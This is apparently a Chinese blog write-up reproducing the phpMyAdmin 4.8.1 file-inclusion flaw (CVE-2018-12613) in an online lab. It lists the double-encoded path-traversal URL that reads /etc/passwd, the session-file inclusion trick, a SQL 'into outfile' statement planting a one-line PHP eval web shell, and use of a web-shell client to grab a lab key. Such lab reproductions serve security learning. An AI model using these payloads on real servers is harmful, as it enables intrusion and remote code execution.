PhpMyAdmin4.8.1后台文件包含漏洞复现(CVE-2018-12613)

       phpmyadmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。

      漏洞复现环境:基于某平台的在线靶场进行漏洞复现

复现过程:

1. 访问网址,是一处phpmyadmin的登录地址首页,通过弱密码可以进入数据库管理界面

2. 根据在网上曝光的 CVE-2018-12613 的漏洞详情,在index.php后添加?target=db_sql.php%3f/../../../../../../../../etc/passwd,显示/etc/passwd的详细内容,可见 ,该版本确实存在文件包含漏洞

3.F12查看复制该网站的session值,然后访问/index.php?target=db_sql.php%253f/../../../../../../tmp/sess_[session],显示phpInfo的默认页面,在该页面找到网站的安装位置:/var/www/html

 

4.写入一句话木马,select '<?php @eval($_POST[hcl]) ?>' into outfile '/var/www/html/hcl.php'

5.上菜刀,连接 http://ip/hcl.php,菜刀连接成功,在根目录下找到了key.txt文件,查看key.txt文件,获得key值。

6. 完成!!!

 

知识点:每次登录phpmyadmin系统的时候,系统就会产生一个sess_sessionID的文件,然后在里面执行的操作,会被记录到这个文件内(linux系统中存放路径为/tmp/sess_[当前会话session值])。

  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值